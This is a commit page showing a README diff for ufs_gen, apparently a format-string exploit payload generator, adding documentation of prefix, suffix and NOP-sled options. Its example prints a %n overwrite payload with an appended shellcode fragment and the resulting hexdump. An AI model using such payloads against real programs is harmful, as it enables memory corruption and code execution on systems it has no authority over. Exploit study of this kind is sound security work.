diff options
author | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 12:43:44 +0000 |
---|---|---|
committer | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 12:43:44 +0000 |
commit | 9aa9983fb7e737d2fa7d1c61b1f26411dbd04407 (patch) | |
tree | 68a57cd561cf3fe0e0d8faf417c2276e14836f32 /README | |
parent | a9f072448d2ffd9f1f275367533945e7a92237a3 (diff) |
update the usage message and the README
Refs: #1
Diffstat (limited to 'README')
-rw-r--r-- | README | 20 |
1 files changed, 20 insertions, 0 deletions
@@ -38,12 +38,32 @@ is not 4 bytes long, there is very few chances that it would work correctly. The support of printf(payload) directly (i.e. without a temporary buffer) is also planned. +We support the option --prefix and --suffix which respectively prepend and +append their argument to the payload. + +We also support the option --sfxnops which adds n NOP byte (0x90) between the +payload and the suffix + Example ======= user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n +user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')" +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C +NOP bytes are at offset 52 (0x34) +suffix is at offset 152 (0x98) +00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".| +00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5| +00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x| +00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............| +00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| +* +00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D| +0000009f + + License ======= |